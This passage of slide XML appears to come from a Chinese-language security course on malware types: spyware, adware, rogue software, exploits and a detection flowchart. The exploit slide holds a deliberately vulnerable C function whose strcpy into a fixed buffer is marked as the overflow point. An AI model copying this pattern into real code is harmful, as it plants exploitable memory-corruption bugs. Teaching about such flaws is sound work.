                  <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
                  <a:t>…</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                  <a:t>）</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="126996" name="Picture 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC22B837-BA00-42CB-ABAC-7434F293D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 y="1970"/>
              <a:ext cx="5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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8E8005F-5AC1-442C-B385-64401124AFBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="969963" y="4508500"/>
            <a:ext cx="8139112" cy="2090738"/>
            <a:chOff x="294" y="2930"/>
            <a:chExt cx="5127" cy="1317"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="126986" name="Group 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3534AA3B-0AB2-4329-8524-2DA4D230A76B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="294" y="2930"/>
              <a:ext cx="5127" cy="1317"/>
              <a:chOff x="294" y="2930"/>
              <a:chExt cx="5127" cy="1317"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="126988" name="Group 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{093641BD-B404-48C6-8816-94A398BDE90D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="294" y="2930"/>
                <a:ext cx="5127" cy="1317"/>
                <a:chOff x="294" y="2930"/>
                <a:chExt cx="5127" cy="1317"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="126990" name="AutoShape 22">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0C8703A-4281-4CC3-8B51-0570D61F2688}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm rot="10800000">
                  <a:off x="4740" y="2930"/>
                  <a:ext cx="681" cy="1271"/>
                </a:xfrm>
                <a:prstGeom prst="flowChartOffpageConnector">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:ln w="12700" cap="sq">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd type="none" w="sm" len="sm"/>
                  <a:tailEnd type="none" w="sm" len="sm"/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr rot="10800000"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恶意软件</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPct val="0"/>
                    </a:spcBef>
                    <a:buClrTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                    <a:t>（进程、</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPct val="0"/>
                    </a:spcBef>
                    <a:buClrTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                    <a:t>端口、</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPct val="0"/>
                    </a:spcBef>
                    <a:buClrTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                    <a:t>服务、</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPct val="0"/>
                    </a:spcBef>
                    <a:buClrTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                    <a:t>注册表键值</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPct val="0"/>
                    </a:spcBef>
                    <a:buClrTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
                    <a:t>…</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                    <a:t>）</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="126991" name="Rectangle 23">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BCDF499-E668-4D28-958D-8CE3DBC9870A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="294" y="3204"/>
                  <a:ext cx="635" cy="952"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="008000"/>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lang="zh-CN" altLang="en-US" sz="1800"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="126992" name="AutoShape 24">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E09F49D2-5DC1-4941-997C-E2DA8B463F0E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="975" y="3158"/>
                  <a:ext cx="1678" cy="499"/>
                </a:xfrm>
                <a:prstGeom prst="notchedRightArrow">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val 50000"/>
                    <a:gd name="adj2" fmla="val 84068"/>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恶意软件是否存在？</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="126993" name="Rectangle 25">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84F1AE83-DDA9-4DB4-9FE1-ADF2DC98ECDB}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2654" y="2931"/>
                  <a:ext cx="453" cy="1316"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>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操作</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPct val="0"/>
                    </a:spcBef>
                    <a:buClrTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                    <a:t>系统</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPct val="0"/>
                    </a:spcBef>
                    <a:buClrTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
                    <a:t>API</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPct val="0"/>
                    </a:spcBef>
                    <a:buClrTx/>
                    <a:buFontTx/>
                    <a:buNone/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
                    <a:t>函数</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="126994" name="AutoShape 26">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{892BDEA1-1BBB-4B35-93CB-B6C8DEC7E9FD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3153" y="3113"/>
                  <a:ext cx="1179" cy="499"/>
                </a:xfrm>
                <a:prstGeom prst="notchedRightArrow">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val 50000"/>
                    <a:gd name="adj2" fmla="val 59068"/>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Font typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                    <a:buChar char="w"/>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SzPct val="95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1800"/>
                    <a:t>查找相关文件？</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="126989" name="Picture 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B789D94-01E3-4ED6-BE38-A53BB6A39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 y="3340"/>
                <a:ext cx="54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pic>
          <p:nvPicPr>
            <p:cNvPr id="126987" name="Picture 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB2CF40-ADF8-420A-8881-FAD9778B86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 y="3339"/>
              <a:ext cx="590"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75460"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2754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75459"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2754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0" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="275462"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="275462"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="275462"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2754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275463"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27546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275461"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="275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animBg="1"/>
      <p:bldP spid="275460" grpId="0" animBg="1"/>
      <p:bldP spid="275461" grpId="0" animBg="1"/>
      <p:bldP spid="275462" grpId="0" animBg="1"/>
      <p:bldP spid="27546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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ACF01E6-4D3A-44B6-82E2-C14FBE3986DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>间谍软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133123" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4070EC4E-806A-426C-900D-FD13E7C37F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>以主动收集用户个人信息、相关机密文件或隐私数据为主，搜集到的数据会主动传送到指定服务器。</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B87278C4-153E-4D0D-B7EE-ABFD48375D01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>广告软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134147" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95141DCC-94C7-4D3C-89EB-44C21233A288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>未经用户允许</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>下载并安装或与其他软件捆绑通过弹出式广告或以其他形式进行商业广告宣传的程序。</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3FCA094-03E1-4A7B-B903-BE2E6C6A743A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>流氓软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135171" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B56D259-BFED-466D-975D-D74C97EB77FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>具有一定的实用价值但具备电脑病毒和黑客软件的部分特征的软件（特别是难以卸载）；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>它处在合法软件和电脑病毒之间的灰色地带，同样极大地侵害着电脑用户的权益。也称为灰色软件。</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FF5F1E-1F75-444E-92BF-158979481045}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.10 Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137219" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{878A276F-918E-474F-88C9-E842B4FF1D23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>精心设计的用于利用特定漏洞以对目标系统进行控制的程序。</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19756B10-79A2-46E3-88DC-1F21437E01A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.10 Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115715" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F057D85F-3EE0-4BDE-9446-1A5165FEAC67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> fun(unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> *data)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>{  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> buffer[BUF_LEN];  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>*)buffer,(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>*)data);//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>溢出点  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>}  </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F30E420C-712E-465E-860B-DEAAC4C5AB01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中华人民共和国刑法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{324052F9-B340-4C86-A39B-DFE4C4615C8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
